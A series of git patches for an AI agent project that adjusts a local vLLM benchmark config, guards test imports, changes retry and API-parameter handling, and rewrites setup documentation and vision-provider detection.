+#       --model Qwen/Qwen3-4B-Thinking-2507 \
+#       --port 9001 \
+#       --gpu-memory-utilization 0.8 \
+#       --max-model-len=32000
+#
+# Then run:
+#   python environments/benchmarks/tblite/tblite_env.py evaluate \
+#       --config environments/benchmarks/tblite/local_vllm.yaml
+
+env:
+  enabled_toolsets: ["terminal", "file"]
+  max_agent_turns: 60
+  max_token_length: 16000
+  agent_temperature: 0.6
+  terminal_backend: "docker"
+  terminal_timeout: 300
+  tool_pool_size: 16
+  dataset_name: "NousResearch/openthoughts-tblite"
+  test_timeout: 600
+  task_timeout: 1200
+  eval_concurrency: 8
+  tool_call_parser: "hermes"
+  tokenizer_name: "Qwen/Qwen3-4B-Thinking-2507"
+  use_wandb: false
+  wandb_name: "tblite-qwen3-4b-thinking"
+  ensure_scores_are_not_same: false
+  data_dir_to_save_evals: "environments/benchmarks/evals/tblite-qwen3-4b-local"
+
+openai:
+  base_url: "http://localhost:9001"
+  model_name: "Qwen/Qwen3-4B-Thinking-2507"
+  server_type: "vllm"
+  health_check: false
diff --git a/environments/benchmarks/terminalbench_2/terminalbench2_env.py b/environments/benchmarks/terminalbench_2/terminalbench2_env.py
index 59ca17e3..1b52c15f 100644
--- a/environments/benchmarks/terminalbench_2/terminalbench2_env.py
+++ b/environments/benchmarks/terminalbench_2/terminalbench2_env.py
@@ -468,17 +468,37 @@ class TerminalBench2EvalEnv(HermesAgentBaseEnv):
             messages.append({"role": "user", "content": self.format_prompt(eval_item)})
 
             # --- 4. Run agent loop ---
-            agent = HermesAgentLoop(
-                server=self.server,
-                tool_schemas=tools,
-                valid_tool_names=valid_names,
-                max_turns=self.config.max_agent_turns,
-                task_id=task_id,
-                temperature=self.config.agent_temperature,
-                max_tokens=self.c...gth,
-                extra_body=self.config.extra_body,
-            )
-            result = await agent.run(messages)
+            # Use ManagedServer (Phase 2) for vLLM/SGLang backends to get
+            # token-level tracking via /generate. Falls back to direct
+            # ServerManager (Phase 1) for OpenAI endpoints.
+            if self._use_managed_server():
+                async with self.server.managed_server(
+                    tokenizer=self.tokenizer,
+                    preserve_think_blocks=bool(self.config.thinking_mode),
+                ) as managed:
+                    agent = HermesAgentLoop(
+                        server=managed,
+                        tool_schemas=tools,
+                        valid_tool_names=valid_names,
+                        max_turns=self.config.max_agent_turns,
+                        task_id=task_id,
+                        temperature=self.config.agent_temperature,
+                        max_tokens=self.config.max_token_length,
+                        extra_body=self.config.extra_body,
+                    )
+                    result = await agent.run(messages)
+            else:
+                agent = HermesAgentLoop(
+                    server=self.server,
+                    tool_schemas=tools,
+                    valid_tool_names=valid_names,
+                    max_turns=self.config.max_agent_turns,
+                    task_id=task_id,
+                    temperature=self.config.agent_temperature,
+                    max_tokens=self.config.max_token_length,
+                    extra_body=self.config.extra_body,
+                )
+                result = await agent.run(messages)
 
             # --- 5. Verify -- run test suite in the agent's sandbox ---
             # Skip verification if the agent produced no meaningful output

From 366de72a38008cccc27199a9a28e3b3df6d73ae0 Mon Sep 17 00:00:00 2001
From: dmahan93 <dmayhem93@gmail.com>
Date: Mon, 9 Mar 2026 23:02:13 -0500
Subject: [PATCH 085/105] add a local vllm instance

---
 environments/benchmarks/tblite/local_vllm.yaml | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)

diff --git a/environments/benchmarks/tblite/local_vllm.yaml b/environments/benchmarks/tblite/local_vllm.yaml
index b6574a6b..17689ba1 100644
--- a/environments/benchmarks/tblite/local_vllm.yaml
+++ b/environments/benchmarks/tblite/local_vllm.yaml
@@ -4,7 +4,7 @@
 #
 # Start the vLLM server from the atropos directory:
 #   python -m example_trainer.vllm_api_server \
-#       --model Qwen/Qwen3-4B-Thinking-2507 \
+#       --model Qwen/Qwen3-4B-Instruct-2507 \
 #       --port 9001 \
 #       --gpu-memory-utilization 0.8 \
 #       --max-model-len=32000
@@ -26,14 +26,15 @@ env:
   task_timeout: 1200
   eval_concurrency: 8
   tool_call_parser: "hermes"
-  tokenizer_name: "Qwen/Qwen3-4B-Thinking-2507"
+  system_prompt: "You are an expert terminal agent. You MUST use the provided tools to complete tasks. Use the terminal tool to run shell commands, read_file to read files, write_file to write files, search_files to search, and patch to edit files. Do NOT write out solutions as text - execute them using the tools. Always start by exploring the environment with terminal commands."
+  tokenizer_name: "Qwen/Qwen3-4B-Instruct-2507"
   use_wandb: false
-  wandb_name: "tblite-qwen3-4b-thinking"
+  wandb_name: "tblite-qwen3-4b-instruct"
   ensure_scores_are_not_same: false
   data_dir_to_save_evals: "environments/benchmarks/evals/tblite-qwen3-4b-local"
 
 openai:
   base_url: "http://localhost:9001"
-  model_name: "Qwen/Qwen3-4B-Thinking-2507"
+  model_name: "Qwen/Qwen3-4B-Instruct-2507"
   server_type: "vllm"
   health_check: false

From 0f53275169f194afe32c6d572e20ded2e943a370 Mon Sep 17 00:00:00 2001
From: dmahan93 <dmayhem93@gmail.com>
Date: Mon, 9 Mar 2026 23:14:53 -0500
Subject: [PATCH 086/105] test: skip atropos-dependent tests when atroposlib
 not installed

Guard all test files that import from environments/ or atroposlib
with try/except + pytest.skip(allow_module_level=True) so they
gracefully skip instead of crashing when deps aren't available.
---
 tests/test_agent_loop_tool_calling.py   | 5 ++++-
 tests/test_agent_loop_vllm.py           | 5 ++++-
 tests/tools/test_modal_sandbox_fixes.py | 7 +++++--
 3 files changed, 13 insertions(+), 4 deletions(-)

diff --git a/tests/test_agent_loop_tool_calling.py b/tests/test_agent_loop_tool_calling.py
index 44fa3c72..b07fdefe 100644
--- a/tests/test_agent_loop_tool_calling.py
+++ b/tests/test_agent_loop_tool_calling.py
@@ -33,7 +33,10 @@ _repo_root = Path(__file__).resolve().parent.parent
 if str(_repo_root) not in sys.path:
     sys.path.insert(0, str(_repo_root))
 
-from environments.agent_loop import AgentResult, HermesAgentLoop
+try:
+    from environments.agent_loop import AgentResult, HermesAgentLoop
+except ImportError:
+    pytest.skip("atroposlib not installed", allow_module_level=True)
 
 
 # =========================================================================
diff --git a/tests/test_agent_loop_vllm.py b/tests/test_agent_loop_vllm.py
index 1a21d440..d47478ec 100644
--- a/tests/test_agent_loop_vllm.py
+++ b/tests/test_agent_loop_vllm.py
@@ -34,7 +34,10 @@ _repo_root = Path(__file__).resolve().parent.parent
 if str(_repo_root) not in sys.path:
     sys.path.insert(0, str(_repo_root))
 
-from environments.agent_loop import AgentResult, HermesAgentLoop
+try:
+    from environments.agent_loop import AgentResult, HermesAgentLoop
+except ImportError:
+    pytest.skip("atroposlib not installed", allow_module_level=True)
 
 
 # =========================================================================
diff --git a/tests/tools/test_modal_sandbox_fixes.py b/tests/tools/test_modal_sandbox_fixes.py
index 49437a8d..b2d7fe02 100644
--- a/tests/tools/test_modal_sandbox_fixes.py
+++ b/tests/tools/test_modal_sandbox_fixes.py
@@ -22,8 +22,11 @@ _repo_root = Path(__file__).resolve().parent.parent.parent
 if str(_repo_root) not in sys.path:
     sys.path.insert(0, str(_repo_root))
 
-import tools.terminal_tool  # noqa: F401
-_tt_mod = sys.modules["tools.terminal_tool"]
+try:
+    import tools.terminal_tool  # noqa: F401
+    _tt_mod = sys.modules["tools.terminal_tool"]
+except ImportError:
+    pytest.skip("hermes-agent tools not importable (missing deps)", allow_module_level=True)
 
 
 # =========================================================================

From d198a647e2f963039185fe5918a8f12a270955f9 Mon Sep 17 00:00:00 2001
From: dmahan93 <dmayhem93@gmail.com>
Date: Mon, 9 Mar 2026 23:33:24 -0500
Subject: [PATCH 087/105] fix: guard all atroposlib imports for CI without
 atropos installed

- environments/__init__.py: try/except on atroposlib imports so
  submodules like tool_call_parsers remain importable standalone
- test_agent_loop.py, test_tool_call_parsers.py,
  test_managed_server_tool_support.py: skip at module level when
  atroposlib is missing
---
 environments/__init__.py                  | 11 ++++++++---
 tests/test_agent_loop.py                  | 17 ++++++++++-------
 tests/test_managed_server_tool_support.py |  5 +++++
 tests/test_tool_call_parsers.py           | 15 +++++++++------
 4 files changed, 32 insertions(+), 16 deletions(-)

diff --git a/environments/__init__.py b/environments/__init__.py
index f0c959ca..282bc06b 100644
--- a/environments/__init__.py
+++ b/environments/__init__.py
@@ -18,9 +18,14 @@ Benchmarks (eval-only):
     - benchmarks/terminalbench_2/: Terminal-Bench 2.0 evaluation
 """
 
-from environments.agent_loop import AgentResult, HermesAgentLoop
-from environments.tool_context import ToolContext
-from environments.hermes_base_env import HermesAgentBaseEnv, HermesAgentEnvConfig
+try:
+    from environments.agent_loop import AgentResult, HermesAgentLoop
+    from environments.tool_context import ToolContext
+    from environments.hermes_base_env import HermesAgentBaseEnv, HermesAgentEnvConfig
+except ImportError:
+    # atroposlib not installed — environments are unavailable but
+    # submodules like tool_call_parsers can still be imported directly.
+    pass
 
 __all__ = [
     "AgentResult",
diff --git a/tests/test_agent_loop.py b/tests/test_agent_loop.py
index 22629b88..bb0ccd06 100644
--- a/tests/test_agent_loop.py
+++ b/tests/test_agent_loop.py
@@ -18,13 +18,16 @@ import pytest
 # Ensure repo root is importable
 sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
 
-from environments.agent_loop import (
-    AgentResult,
-    HermesAgentLoop,
-    ToolError,
-    _extract_reasoning_from_message,
-    resize_tool_pool,
-)
+try:
+    from environments.agent_loop import (
+        AgentResult,
+        HermesAgentLoop,
+        ToolError,
+        _extract_reasoning_from_message,
+        resize_tool_pool,
+    )
+except ImportError:
+    pytest.skip("atroposlib not installed", allow_module_level=True)
 
 
 # ─── Mock server infrastructure ─────────────────────────────────────────
diff --git a/tests/test_managed_server_tool_support.py b/tests/test_managed_server_tool_support.py
index 00b0e94f..2ab6abb0 100644
--- a/tests/test_managed_server_tool_support.py
+++ b/tests/test_managed_server_tool_support.py
@@ -19,6 +19,11 @@ import pytest
 
 sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
 
+try:
+    import atroposlib  # noqa: F401
+except ImportError:
+    pytest.skip("atroposlib not installed", allow_module_level=True)
+
 
 class TestManagedServerAPI:
     """Test that ManagedServer's API matches what hermes-agent expects."""
diff --git a/tests/test_tool_call_parsers.py b/tests/test_tool_call_parsers.py
index 6a07a226..9f284daf 100644
--- a/tests/test_tool_call_parsers.py
+++ b/tests/test_tool_call_parsers.py
@@ -14,12 +14,15 @@ import pytest
 # Ensure repo root is importable
 sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
 
-from environments.tool_call_parsers import (
-    ParseResult,
-    ToolCallParser,
-    get_parser,
-    list_parsers,
-)
+try:
+    from environments.tool_call_parsers import (
+        ParseResult,
+        ToolCallParser,
+        get_parser,
+        list_parsers,
+    )
+except ImportError:
+    pytest.skip("atroposlib not installed", allow_module_level=True)
 
 
 # ─── Registry tests ─────────────────────────────────────────────────────

From 59b53f0a2313fbafef3c189f4f6911bd3dbe32db Mon Sep 17 00:00:00 2001
From: dmahan93 <dmayhem93@gmail.com>
Date: Mon, 9 Mar 2026 23:37:32 -0500
Subject: [PATCH 088/105] fix: skip tests when atroposlib/minisweagent
 unavailable in CI

- test_agent_loop_tool_calling.py: import atroposlib at module level
  to trigger skip (environments.agent_loop is now importable without
  atroposlib due to __init__.py graceful fallback)
- test_modal_sandbox_fixes.py: skip TestToolResolution tests when
  minisweagent not installed
---
 tests/test_agent_loop_tool_calling.py   |  1 +
 tests/tools/test_modal_sandbox_fixes.py | 11 +++++++++++
 2 files changed, 12 insertions(+)

diff --git a/tests/test_agent_loop_tool_calling.py b/tests/test_agent_loop_tool_calling.py
index b07fdefe..857be5fa 100644
--- a/tests/test_agent_loop_tool_calling.py
+++ b/tests/test_agent_loop_tool_calling.py
@@ -35,6 +35,7 @@ if str(_repo_root) not in sys.path:
 
 try:
     from environments.agent_loop import AgentResult, HermesAgentLoop
+    from atroposlib.envs.server_handling.openai_server import OpenAIServer  # noqa: F401
 except ImportError:
     pytest.skip("atroposlib not installed", allow_module_level=True)
 
diff --git a/tests/tools/test_modal_sandbox_fixes.py b/tests/tools/test_modal_sandbox_fixes.py
index b2d7fe02..6da25216 100644
--- a/tests/tools/test_modal_sandbox_fixes.py
+++ b/tests/tools/test_modal_sandbox_fixes.py
@@ -36,8 +36,17 @@ except ImportError:
 class TestToolResolution:
     """Verify get_tool_definitions returns all expected tools for eval."""
 
+    def _has_minisweagent(self):
+        try:
+            import minisweagent  # noqa: F401
+            return True
+        except ImportError:
+            return False
+
     def test_terminal_and_file_toolsets_resolve_all_tools(self):
         """enabled_toolsets=['terminal', 'file'] should produce 6 tools."""
+        if not self._has_minisweagent():
+            pytest.skip("minisweagent not installed (git submodule update --init)")
         from model_tools import get_tool_definitions
         tools = get_tool_definitions(
             enabled_toolsets=["terminal", "file"],
@@ -49,6 +58,8 @@ class TestToolResolution:
 
     def test_terminal_tool_present(self):
         """The terminal tool must be present (not silently dropped)."""
+        if not self._has_minisweagent():
+            pytest.skip("minisweagent not installed (git submodule update --init)")
         from model_tools import get_tool_definitions
         tools = get_tool_definitions(
             enabled_toolsets=["terminal", "file"],

From d2dee43825e30fc2ba61820dcf5b6b1df5e7c9aa Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 07:00:14 -0700
Subject: [PATCH 089/105] fix: allow tool_choice, parallel_tool_calls,
 prompt_cache_key in codex preflight
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

_preflight_codex_api_kwargs rejected these three fields as unsupported,
but _build_api_kwargs adds them to every codex request. This caused a
ValueError before _interruptible_api_call was reached, which was caught
by the retry loop and retried with exponential backoff — appearing as
an infinite hang in tests (275s total backoff across 6 retries).

The fix adds these keys to allowed_keys and passes them through to the
normalized request dict.

This fixes the hanging test_cron_run_job_codex_path_handles_internal_401_refresh
test (now passes in 2.6s instead of timing out).
---
 run_agent.py | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/run_agent.py b/run_agent.py
index 6e9fc2c3..295106e3 100644
--- a/run_agent.py
+++ b/run_agent.py
@@ -1781,6 +1781,7 @@ class AIAgent:
         allowed_keys = {
             "model", "instructions", "input", "tools", "store",
             "reasoning", "include", "max_output_tokens", "temperature",
+            "tool_choice", "parallel_tool_calls", "prompt_cache_key",
         }
         normalized: Dict[str, Any] = {
             "model": model,
@@ -1806,6 +1807,12 @@ class AIAgent:
         if isinstance(temperature, (int, float)):
             normalized["temperature"] = float(temperature)
 
+        # Pass through tool_choice, parallel_tool_calls, prompt_cache_key
+        for passthrough_key in ("tool_choice", "parallel_tool_calls", "prompt_cache_key"):
+            val = api_kwargs.get(passthrough_key)
+            if val is not None:
+                normalized[passthrough_key] = val
+
         if allow_stream:
             stream = api_kwargs.get("stream")
             if stream is not None and stream is not True:

From 683c8b24d41f9a40793d28d38b457f31d73dc508 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 07:04:46 -0700
Subject: [PATCH 090/105] fix: reduce max_retries to 3 and make
 ValueError/TypeError non-retryable
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

- max_retries reduced from 6 to 3 — 6 retries with exponential backoff
  could stall for ~275s total on persistent errors
- ValueError and TypeError now detected as non-retryable client errors
  and abort immediately instead of being retried with backoff (these are
  local validation/programming errors that will never succeed on retry)
---
 run_agent.py | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/run_agent.py b/run_agent.py
index 295106e3..7543d1d0 100644
--- a/run_agent.py
+++ b/run_agent.py
@@ -3469,7 +3469,7 @@ class AIAgent:
             
             api_start_time = time.time()
             retry_count = 0
-            max_retries = 6  # Increased to allow longer backoff periods
+            max_retries = 3
             compression_attempts = 0
             max_compression_attempts = 3
             codex_auth_retry_attempted = False
@@ -3939,8 +3939,11 @@ class AIAgent:
                     # These indicate a problem with the request itself (bad model ID,
                     # invalid API key, forbidden, etc.) and will never succeed on retry.
                     # Note: 413 and context-length errors are excluded — handled above.
+                    # Also catch local validation errors (ValueError, TypeError) — these
+                    # are programming bugs, not transient failures.
+                    is_local_validation_error = isinstance(api_error, (ValueError, TypeError))
                     is_client_status_error = isinstance(status_code, int) and 400 <= status_code < 500 and status_code != 413
-                    is_client_error = (is_client_status_error or any(phrase in error_msg for phrase in [
+                    is_client_error = (is_local_validation_error or is_client_status_error or any(phrase in error_msg for phrase in [
                         'error code: 401', 'error code: 403',
                         'error code: 404', 'error code: 422',
                         'is not a valid model', 'invalid model', 'model not found',

From db496180db6256942083a0800749042865bb66da Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 07:27:57 -0700
Subject: [PATCH 091/105] docs: remove hermes setup from install flow, point to
 hermes model/tools instead

The installer already handles full setup (provider config, etc.), so
telling users to run 'hermes setup' post-install is redundant and
confusing. Updated all docs to reflect the correct flow:

1. Run the installer (handles everything including provider setup)
2. Use 'hermes model', 'hermes tools', 'hermes gateway setup' to
   reconfigure individual settings later

Files updated:
- README.md: removed setup from quick install & getting started
- installation.md: updated post-install, manual step 9, troubleshooting
- quickstart.md: updated provider section & quick reference table
- cli-commands.md: updated hermes setup description
- faq.md: replaced hermes setup references with specific commands
---
 README.md                                    |  3 +--
 website/docs/getting-started/installation.md | 17 ++++++++++++-----
 website/docs/getting-started/quickstart.md   |  5 ++---
 website/docs/reference/cli-commands.md       |  2 +-
 website/docs/reference/faq.md                |  8 ++++----
 5 files changed, 20 insertions(+), 15 deletions(-)

diff --git a/README.md b/README.md
index aaa541d5..444aae52 100644
--- a/README.md
+++ b/README.md
@@ -41,7 +41,6 @@ After installation:
 
 ```bash
 source ~/.bashrc    # reload shell (or: source ~/.zshrc)
-hermes setup        # configure your LLM provider
 hermes              # start chatting!
 ```
 
@@ -52,7 +51,7 @@ hermes              # start chatting!
 ```bash
 hermes              # Interactive CLI — start a conversation
 hermes model        # Switch provider or model
-hermes setup        # Re-run the setup wizard
+hermes tools        # Configure which tools are enabled
 hermes gateway      # Start the messaging gateway (Telegram, Discord, etc.)
 hermes update       # Update to the latest version
 hermes doctor       # Diagnose any issues
diff --git a/website/docs/getting-started/installation.md b/website/docs/getting-started/installation.md
index d7482202..cd95de3e 100644
--- a/website/docs/getting-started/installation.md
+++ b/website/docs/getting-started/installation.md
@@ -22,7 +22,7 @@ Native Windows is **not supported**. Please install [WSL2](https://learn.microso
 
 ### What the Installer Does
 
-The installer handles everything automatically — all dependencies (Python, Node.js, ripgrep, ffmpeg), the repo clone, virtual environment, and global `hermes` command setup. It finishes by running the interactive setup wizard to configure your LLM provider.
+The installer handles everything automatically — all dependencies (Python, Node.js, ripgrep, ffmpeg), the repo clone, virtual environment, global `hermes` command setup, and LLM provider configuration. By the end, you're ready to chat.
 
 ### After Installation
 
@@ -30,10 +30,17 @@ Reload your shell and start chatting:
 
 ```bash
 source ~/.bashrc   # or: source ~/.zshrc
-hermes setup       # Configure API keys (if you skipped during install)
 hermes             # Start chatting!
 ```
 
+To reconfigure individual settings later, use the dedicated commands:
+
+```bash
+hermes model       # Switch provider or model
+hermes tools       # Configure which tools are enabled
+hermes gateway setup  # Set up messaging platforms
+```
+
 ---
 
 ## Prerequisites
@@ -192,10 +199,10 @@ echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.zshrc && source ~/.zshrc
 fish_add_path $HOME/.local/bin
 ```
 
-### Step 9: Run the Setup Wizard (Optional)
+### Step 9: Configure Your Provider
 
 ```bash
-hermes setup
+hermes model       # Select your LLM provider and model
 ```
 
 ### Step 10: Verify the Installation
@@ -253,7 +260,7 @@ hermes
 | Problem | Solution |
 |---------|----------|
 | `hermes: command not found` | Reload your shell (`source ~/.bashrc`) or check PATH |
-| `API key not set` | Run `hermes setup` or `hermes config set OPENROUTER_API_KEY your_key` |
+| `API key not set` | Run `hermes model` to configure your provider, or `hermes config set OPENROUTER_API_KEY your_key` |
 | Missing config after update | Run `hermes config check` then `hermes config migrate` |
 
 For more diagnostics, run `hermes doctor` — it will tell you exactly what's missing and how to fix it.
diff --git a/website/docs/getting-started/quickstart.md b/website/docs/getting-started/quickstart.md
index af685e0a..a2b8904f 100644
--- a/website/docs/getting-started/quickstart.md
+++ b/website/docs/getting-started/quickstart.md
@@ -29,10 +29,10 @@ source ~/.bashrc   # or source ~/.zshrc
 
 ## 2. Set Up a Provider
 
-The installer runs the setup wizard automatically. If you skipped it, run:
+The installer configures your LLM provider automatically. To change it later, run:
 
 ```bash
-hermes setup
+hermes model
 ```
 
 This walks you through selecting an inference provider:
@@ -160,7 +160,6 @@ mcp_servers:
 | Command | Description |
 |---------|-------------|
 | `hermes` | Start chatting |
-| `hermes setup` | Configure providers and settings |
 | `hermes model` | Switch provider or model |
 | `hermes tools` | Configure which tools are enabled per platform |
 | `hermes doctor` | Diagnose issues |
diff --git a/website/docs/reference/cli-commands.md b/website/docs/reference/cli-commands.md
index 136cf0dc..f9a9dc2f 100644
--- a/website/docs/reference/cli-commands.md
+++ b/website/docs/reference/cli-commands.md
@@ -38,7 +38,7 @@ These are commands you run from your shell.
 
 | Command | Description |
 |---------|-------------|
-| `hermes setup` | Full setup wizard (provider, terminal, messaging) |
+| `hermes setup` | Full setup wizard (runs automatically during install) |
 | `hermes config` | View current configuration |
 | `hermes config edit` | Open config.yaml in your editor |
 | `hermes config set KEY VAL` | Set a specific value |
diff --git a/website/docs/reference/faq.md b/website/docs/reference/faq.md
index a477c533..88e5210a 100644
--- a/website/docs/reference/faq.md
+++ b/website/docs/reference/faq.md
@@ -26,7 +26,7 @@ Hermes Agent works with any OpenAI-compatible API. Supported providers include:
 - **MiniMax** — global and China endpoints
 - **Local models** — via [Ollama](https://ollama.com/), [vLLM](https://docs.vllm.ai/), [llama.cpp](https://github.com/ggerganov/llama.cpp), [SGLang](https://github.com/sgl-project/sglang), or any OpenAI-compatible server
 
-Set your provider with `hermes setup` or by editing `~/.hermes/.env`. See the [Environment Variables](./environment-variables.md) reference for all provider keys.
+Set your provider with `hermes model` or by editing `~/.hermes/.env`. See the [Environment Variables](./environment-variables.md) reference for all provider keys.
 
 ### Does it work on Windows?
 
@@ -160,8 +160,8 @@ curl -fsSL https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scri
 # Check which keys are set
 hermes config get OPENROUTER_API_KEY
 
-# Re-run interactive setup
-hermes setup
+# Re-configure your provider
+hermes model
 
 # Or set directly
 hermes config set OPENROUTER_API_KEY sk-or-v1-xxxxxxxxxxxx
@@ -279,7 +279,7 @@ hermes gateway logs
 **Cause:** Network issues, bot token expired, or platform webhook misconfiguration.
 
 **Solution:**
-- Verify your bot token is valid with `hermes setup`
+- Verify your bot token is valid with `hermes gateway setup`
 - Check gateway logs: `hermes gateway logs`
 - For webhook-based platforms (Slack, WhatsApp), ensure your server is publicly accessible
 

From 43cb35cb21f5addb1ae6ef853a3cf8d08d566b51 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 07:30:28 -0700
Subject: [PATCH 092/105] docs: list individual config commands first, then
 hermes setup as all-in-one

Show users the specific commands for each config area (hermes model,
hermes tools, hermes config set, hermes gateway setup) and then
present 'hermes setup' as the option to configure everything at once.
---
 README.md                                    |  4 +++-
 website/docs/getting-started/installation.md |  6 ++++--
 website/docs/getting-started/quickstart.md   | 11 +++++++----
 website/docs/reference/cli-commands.md       |  2 +-
 4 files changed, 15 insertions(+), 8 deletions(-)

diff --git a/README.md b/README.md
index 444aae52..3e41fbf7 100644
--- a/README.md
+++ b/README.md
@@ -50,9 +50,11 @@ hermes              # start chatting!
 
 ```bash
 hermes              # Interactive CLI — start a conversation
-hermes model        # Switch provider or model
+hermes model        # Choose your LLM provider and model
 hermes tools        # Configure which tools are enabled
+hermes config set   # Set individual config values
 hermes gateway      # Start the messaging gateway (Telegram, Discord, etc.)
+hermes setup        # Run the full setup wizard (configures everything at once)
 hermes update       # Update to the latest version
 hermes doctor       # Diagnose any issues
 ```
diff --git a/website/docs/getting-started/installation.md b/website/docs/getting-started/installation.md
index cd95de3e..04ba46e3 100644
--- a/website/docs/getting-started/installation.md
+++ b/website/docs/getting-started/installation.md
@@ -36,9 +36,11 @@ hermes             # Start chatting!
 To reconfigure individual settings later, use the dedicated commands:
 
 ```bash
-hermes model       # Switch provider or model
-hermes tools       # Configure which tools are enabled
+hermes model          # Choose your LLM provider and model
+hermes tools          # Configure which tools are enabled
 hermes gateway setup  # Set up messaging platforms
+hermes config set     # Set individual config values
+hermes setup          # Or run the full setup wizard to configure everything at once
 ```
 
 ---
diff --git a/website/docs/getting-started/quickstart.md b/website/docs/getting-started/quickstart.md
index a2b8904f..832ba0be 100644
--- a/website/docs/getting-started/quickstart.md
+++ b/website/docs/getting-started/quickstart.md
@@ -29,13 +29,15 @@ source ~/.bashrc   # or source ~/.zshrc
 
 ## 2. Set Up a Provider
 
-The installer configures your LLM provider automatically. To change it later, run:
+The installer configures your LLM provider automatically. To change it later, use one of these commands:
 
 ```bash
-hermes model
+hermes model       # Choose your LLM provider and model
+hermes tools       # Configure which tools are enabled
+hermes setup       # Or configure everything at once
 ```
 
-This walks you through selecting an inference provider:
+`hermes model` walks you through selecting an inference provider:
 
 | Provider | What it is | How to set up |
 |----------|-----------|---------------|
@@ -160,8 +162,9 @@ mcp_servers:
 | Command | Description |
 |---------|-------------|
 | `hermes` | Start chatting |
-| `hermes model` | Switch provider or model |
+| `hermes model` | Choose your LLM provider and model |
 | `hermes tools` | Configure which tools are enabled per platform |
+| `hermes setup` | Full setup wizard (configures everything at once) |
 | `hermes doctor` | Diagnose issues |
 | `hermes update` | Update to latest version |
 | `hermes gateway` | Start the messaging gateway |
diff --git a/website/docs/reference/cli-commands.md b/website/docs/reference/cli-commands.md
index f9a9dc2f..946b47b5 100644
--- a/website/docs/reference/cli-commands.md
+++ b/website/docs/reference/cli-commands.md
@@ -38,7 +38,7 @@ These are commands you run from your shell.
 
 | Command | Description |
 |---------|-------------|
-| `hermes setup` | Full setup wizard (runs automatically during install) |
+| `hermes setup` | Full setup wizard — configures provider, model, terminal, and messaging all at once |
 | `hermes config` | View current configuration |
 | `hermes config edit` | Open config.yaml in your editor |
 | `hermes config set KEY VAL` | Set a specific value |

From c64efa92607bf6af0de66236fff93d1b08d34f82 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 07:48:44 -0700
Subject: [PATCH 093/105] fix: smart vision setup that respects the user's
 chosen provider
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

The old flow blindly asked for an OpenRouter API key after ANY non-OR
provider selection, even for Nous Portal and Codex which already
support vision natively. This was confusing and annoying.

New behavior:
- OpenRouter: skip — vision uses Gemini via their OR key
- Nous Portal OAuth: skip — vision uses Gemini via Nous
- OpenAI Codex: skip — gpt-5.3-codex supports vision
- Custom endpoint (api.openai.com): show OpenAI vision model picker
  (gpt-4o, gpt-4o-mini, gpt-4.1, etc.), saves AUXILIARY_VISION_MODEL
- Custom (other) / z.ai / kimi / minimax / nous-api:
  - First checks if existing OR/Nous creds already cover vision
  - If not, offers friendly choice: OpenRouter / OpenAI / Skip
  - No more 'enter OpenRouter key' thrown in your face

Also fixes the setup summary to check actual vision availability
across all providers instead of hardcoding 'requires OPENROUTER_API_KEY'.
MoA still correctly requires OpenRouter (calls multiple frontier models).
---
 hermes_cli/setup.py | 143 +++++++++++++++++++++++++++++++++++++++-----
 1 file changed, 127 insertions(+), 16 deletions(-)

diff --git a/hermes_cli/setup.py b/hermes_cli/setup.py
index c471b1b9..1690e48c 100644
--- a/hermes_cli/setup.py
+++ b/hermes_cli/setup.py
@@ -292,12 +292,41 @@ def _print_setup_summary(config: dict, hermes_home):
     
     tool_status = []
     
-    # OpenRouter (required for vision, moa)
+    # Vision — works with OpenRouter, Nous OAuth, Codex OAuth, or OpenAI endpoint
+    _has_vision = False
+    _vision_via = None
     if get_env_value('OPENROUTER_API_KEY'):
+        _has_vision, _vision_via = True, "OpenRouter/Gemini"
+    else:
+        try:
+            _vauth_path = Path(os.path.expanduser("~/.hermes/auth.json"))
+            if _vauth_path.is_file():
+                import json as _vjson
+                _vauth = _vjson.loads(_vauth_path.read_text())
+                if _vauth.get("active_provider") == "nous":
+                    _np = _vauth.get("providers", {}).get("nous", {})
+                    if _np.get("agent_key") or _np.get("access_token"):
+                        _has_vision, _vision_via = True, "Nous Portal/Gemini"
+                elif _vauth.get("active_provider") == "openai-codex":
+                    _cp = _vauth.get("providers", {}).get("openai-codex", {})
+                    if _cp.get("tokens", {}).get("access_token"):
+                        _has_vision, _vision_via = True, "OpenAI Codex"
+        except Exception:
+            pass
+    if not _has_vision:
+        _oai_base = get_env_value('OPENAI_BASE_URL') or ""
+        if get_env_value('OPENAI_API_KEY') and "api.openai.com" in _oai_base.lower():
+            _has_vision, _vision_via = True, "OpenAI"
+
+    if _has_vision:
         tool_status.append(("Vision (image analysis)", True, None))
+    else:
+        tool_status.append(("Vision (image analysis)", False, "run 'hermes setup' to configure"))
+
+    # Mixture of Agents — requires OpenRouter specifically (calls multiple models)
+    if get_env_value('OPENROUTER_API_KEY'):
         tool_status.append(("Mixture of Agents", True, None))
     else:
-        tool_status.append(("Vision (image analysis)", False, "OPENROUTER_API_KEY"))
         tool_status.append(("Mixture of Agents", False, "OPENROUTER_API_KEY"))
     
     # Firecrawl (web tools)
@@ -889,22 +918,104 @@ def setup_model_provider(config: dict):
 
     # else: provider_idx == 9 (Keep current) — only shown when a provider already exists
 
-    # ── OpenRouter API Key for tools (if not already set) ──
-    # Tools (vision, web, MoA) use OpenRouter independently of the main provider.
-    # Prompt for OpenRouter key if not set and a non-OpenRouter provider was chosen.
